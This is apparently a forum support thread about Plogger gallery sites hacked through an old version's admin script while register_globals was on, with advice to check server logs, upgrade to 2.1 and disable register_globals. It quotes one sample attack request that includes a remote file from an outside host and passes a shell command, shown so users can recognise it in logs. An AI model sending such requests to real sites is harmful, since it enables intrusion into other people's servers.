I was running the new 2.1 version of plogger and I decided to do some work on my layout when I noticed my galleries would not load. I looked in my FTP and found odd graphic , php and hrml files. So now I have to start all over again and reinstall everything. :(
Are you sure it wasn't hacked before you installed the new version? There is a good chance that maybe your passwords were compromised through the vulnerability in version 2, and just now they decided to wreak some havok after the upgrade. Could you please check your raw server logs and see if you can find the malicious activity and date of attack.
You can access your raw server logs by going to your ISP control panel, same place where you administer databases and such. There is an option to look at raw server logs, which will basically just be a list of HTTP requests to your webserver. Look for anything suspicious like:
GET /photos/admin/plog-admin-functions.php?config[basedir]=http://www.blah.hpgvip.ig.com.br/cse.gif?&cmd=id
Are you running any other applications on your website? Wordpress? Any third-party scripts?
I'm in agreement with Mike. rjupiter, you've been using Plogger for a long time, so it's actually impossible that you had never installed Beta 2, because I saw it on your server.
It's not an accusation (and nobody should feel bad about it), as much as an assertion, because 2.1 is a security release; if it's insecure, we need to know and fix it. We're very sorry you got hacked, and it's not your fault, but be sure to install Beta 2.1 (or the nightly build if you're more inclined).
oops , ok I think your right all my fault I was look at what was on my computer and not on my site (which I couldn't do since all got wiped) Well I contacted my host and they are shutting of the register globals on all my servers/sites as I am running Mambo/ eshop and it has the same problem and it is important that I don't get hacked with and online shop.
Will use the new version, bad , bad me for not catching this and updating. Ah live and learn.
thanx, well I talked to my really great web host and he turned off register_globals on both my sites which is great and I now have v 2.1 installed. Now all I have to do is reupload all my images etc...
My box got hacked as well. Index.html was defaced and a bunch of php-based tools were uploaded. It appears they came in through the plogger admin function. Yea...I wasn't running the patched version. Register_globals was also on. Both have been resolved :-)